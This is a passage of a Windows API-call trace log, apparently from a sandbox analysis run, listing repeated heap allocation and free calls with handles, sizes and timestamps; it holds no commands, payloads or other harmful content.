hHeap=0x6a0000) returned 1 [0190.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) 